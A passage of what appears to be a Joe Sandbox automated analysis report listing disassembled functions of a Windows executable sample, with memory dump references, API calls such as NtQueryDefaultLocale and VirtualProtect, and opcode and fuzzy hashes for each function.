                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 7dda52cc7ad02ff32747c993fe9b261ba6fd3828d7432a4cfff1f4bd5860bd54
                                                                                                      • Instruction ID: 84346f57a23f052a83af1eebd262df37e9240617083fe1a51bf8f17a13a36079
                                                                                                      • Opcode Fuzzy Hash: 7dda52cc7ad02ff32747c993fe9b261ba6fd3828d7432a4cfff1f4bd5860bd54
                                                                                                      • Instruction Fuzzy Hash: 4DB1E1B1D052688AF7208B24DC54BEAB7B5FF50304F0480FAD84D9A281E73D9ED58F66
                                                                                                      Function 004162AE Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 281nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000001,?), ref: 0041656B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID: L$L$R$W$_Q$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 2949231068-2907935017
                                                                                                      • Opcode ID: 709d8d69d770de32dc673fb3d29fdc412b21556c2f3946fd61a17c78c8f801e1
                                                                                                      • Instruction ID: b0a18cd40880a8fbefcc928a0a1c4eb24b67cd407aac34529f75f5ca0dc11b43
                                                                                                      • Opcode Fuzzy Hash: 709d8d69d770de32dc673fb3d29fdc412b21556c2f3946fd61a17c78c8f801e1
                                                                                                      • Instruction Fuzzy Hash: 27B1E1B1D052688AF7208B24DC54BEAB7B5FF50304F0480FAD84D9A281E73D9ED58F66
                                                                                                      Function 00417545 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 8M5_
                                                                                                      • API String ID: 0-897359634
                                                                                                      • Opcode ID: 383be470befeb71253590f87977548167369dd28c3d544051f63996992b27b10
                                                                                                      • Instruction ID: 16a0925a836cf47b27bc534c2c357441cf20ab3a5868e5645387894b8c36ba06
                                                                                                      • Opcode Fuzzy Hash: 383be470befeb71253590f87977548167369dd28c3d544051f63996992b27b10
                                                                                                      • Instruction Fuzzy Hash: A371B0B6D092289AE7648B14DC84BEBB775FF45310F1040FAD90EA3280EB785EC1CB56
                                                                                                      Function 00406F31 Relevance: 1.9, APIs: 1, Instructions: 395memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNELBASE(00000000,?,00000040,00000000,00000000,?,?,0040736D,00000001,?,0040736D,?,?,0040736D,00000000,00407357), ref: 00407A89
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 544645111-0
                                                                                                      • Opcode ID: bc570f42343227128b76edb8c5ed7525ee8617d6a54640070d0ffa512aab4fb2
                                                                                                      • Instruction ID: 32063dd04abe629f49fe4c98286d0a3b81b802a5c25626bf15061d457c7b3036
                                                                                                      • Opcode Fuzzy Hash: bc570f42343227128b76edb8c5ed7525ee8617d6a54640070d0ffa512aab4fb2
                                                                                                      • Instruction Fuzzy Hash: 81F15FB1D092689BEB24CB14DC90BEAB7B5EB45311F1441FAD80E66381D6386FC2CF56
                                                                                                      Function 00417015 Relevance: 1.9, APIs: 1, Instructions: 364COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3f2d62be735bc534d9cd4870756d74bb1c0105942ad29166fe927ee59a992917
                                                                                                      • Instruction ID: 7cc7124e290359d32216b1e8dddba1454dc98fdbe96185efcd97f3164935b088
                                                                                                      • Opcode Fuzzy Hash: 3f2d62be735bc534d9cd4870756d74bb1c0105942ad29166fe927ee59a992917
                                                                                                      • Instruction Fuzzy Hash: E2F18BB1D082288BEB24CA14DC90BEABBB5EF45315F1481EAD94D67380D7395EC2CF95
                                                                                                      Function 0041776A Relevance: 1.7, APIs: 1, Instructions: 210nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: 5686c37eee20d3b9bfe66d0920343cae87a3730e227465d94676f80767ae5bb4
                                                                                                      • Instruction ID: 6bde37e01a04f225bef912dd89709de30e94bc558f38772ed06b439152f3bc3b
                                                                                                      • Opcode Fuzzy Hash: 5686c37eee20d3b9bfe66d0920343cae87a3730e227465d94676f80767ae5bb4
                                                                                                      • Instruction Fuzzy Hash: 9071B0B6D042299AE7648B15DC84BEBB775FB85310F1040FAD90E67280EB785EC2CB56
                                                                                                      Function 00417686 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ae9a55fb0dea4bc748f9ade22f07b41ca8534b3110077db9dad83ab22dd6f928
                                                                                                      • Instruction ID: 3dd9441b94d362e14890b2e6230bd3d0f175708883f7e45f61f23fa3f27d72e6
                                                                                                      • Opcode Fuzzy Hash: ae9a55fb0dea4bc748f9ade22f07b41ca8534b3110077db9dad83ab22dd6f928
                                                                                                      • Instruction Fuzzy Hash: DF71BFB5D092299AEB248B15DC84BFAB775FB45310F1040FAD80EA6680EB785EC1CF95
                                                                                                      Function 004178F1 Relevance: 1.7, APIs: 1, Instructions: 189nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: 35ec7b17579a227abb604530df28eb402e90cba289c4024197c20a8eb8b8ff94
                                                                                                      • Instruction ID: 31cfb4cc598e2bad3408cffcac68639d6fb1be47acb1d389d0f04eae0bba21dd
                                                                                                      • Opcode Fuzzy Hash: 35ec7b17579a227abb604530df28eb402e90cba289c4024197c20a8eb8b8ff94
                                                                                                      • Instruction Fuzzy Hash: 0971BD71E081688AEB24CB18DC90AFEBBB1BF85341F1441EAC80E66281D7381FC1CE55
                                                                                                      Function 004173C2 Relevance: 1.7, APIs: 1, Instructions: 170nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: a392bc2225992db0382a8bd2aedc8415ea3c02e1aa2c5eda694e1ae424380a4d
                                                                                                      • Instruction ID: 508d7dd70f0aa08315afe2d1a1417cb414ca53afc8e0ca57c5c6afe5d214fe60
                                                                                                      • Opcode Fuzzy Hash: a392bc2225992db0382a8bd2aedc8415ea3c02e1aa2c5eda694e1ae424380a4d
                                                                                                      • Instruction Fuzzy Hash: CE51F6B6D082385AE7648A14DC98AEBBB78EF45310F1040BBD90DA7680E77C5EC5CE95
                                                                                                      Function 0041763C Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: cd28b2ffd6c6216c20400912a3fca03c3765467138a02766dc8926aca8d37f98
                                                                                                      • Instruction ID: d380cb4be1c1713c31495549892fe41aa9273f62f91dc27eb1432aa7d87b6c93
                                                                                                      • Opcode Fuzzy Hash: cd28b2ffd6c6216c20400912a3fca03c3765467138a02766dc8926aca8d37f98
                                                                                                      • Instruction Fuzzy Hash: 0F41C5B1D092289AEB649A15DC94BFB7774EB45310F1040FFD90EA6280EB3C5EC2DE95
                                                                                                      Function 00417645 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
